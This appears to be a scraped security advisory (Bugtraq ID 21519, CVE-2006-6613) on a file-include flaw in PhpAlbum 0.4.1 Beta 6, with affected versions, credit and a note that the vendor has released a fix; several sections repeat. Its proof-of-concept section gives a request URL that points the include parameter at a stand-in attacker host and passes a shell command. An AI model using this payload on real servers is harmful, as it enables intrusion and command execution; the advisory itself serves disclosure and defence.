PhpAlbum Language.php Local File Include Vulnerability
BID:21519
Info
PhpAlbum Language.php Local File Include Vulnerability
| Bugtraq ID: | 21519 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-6613 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 10 2006 12:00AM |
| Updated: | Nov 05 2008 04:15PM |
| Credit: | Kacper is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpAlbum.net phpalbum 0.4.1 Beta 6 phpAlbum.net phpalbum 4.1 |
| Not Vulnerable: |
phpAlbum.net phpalbum 4.1.14 |
Discussion
PhpAlbum Language.php Local File Include Vulnerability
PhpAlbum is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and to execute local scripts.
PhpAlbum 0.4.1 Beta 6 is vulnerable.
PhpAlbum is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and to execute local scripts.
PhpAlbum 0.4.1 Beta 6 is vulnerable.
Exploit / POC
PhpAlbum Language.php Local File Include Vulnerability
Attackers can exploit this issue via a web client.
A proof of concept demonstrating this issue is as follows:
http://example.com/[path]/language.php?cmd=ls%20-la&pa_lang[include_file]=http://attacker.com
Attackers can exploit this issue via a web client.
A proof of concept demonstrating this issue is as follows:
http://example.com/[path]/language.php?cmd=ls%20-la&pa_lang[include_file]=http://attacker.com
Solution / Fix
PhpAlbum Language.php Local File Include Vulnerability
Solution:
The vendor has released an update. Please see the references for more information.
Solution:
The vendor has released an update. Please see the references for more information.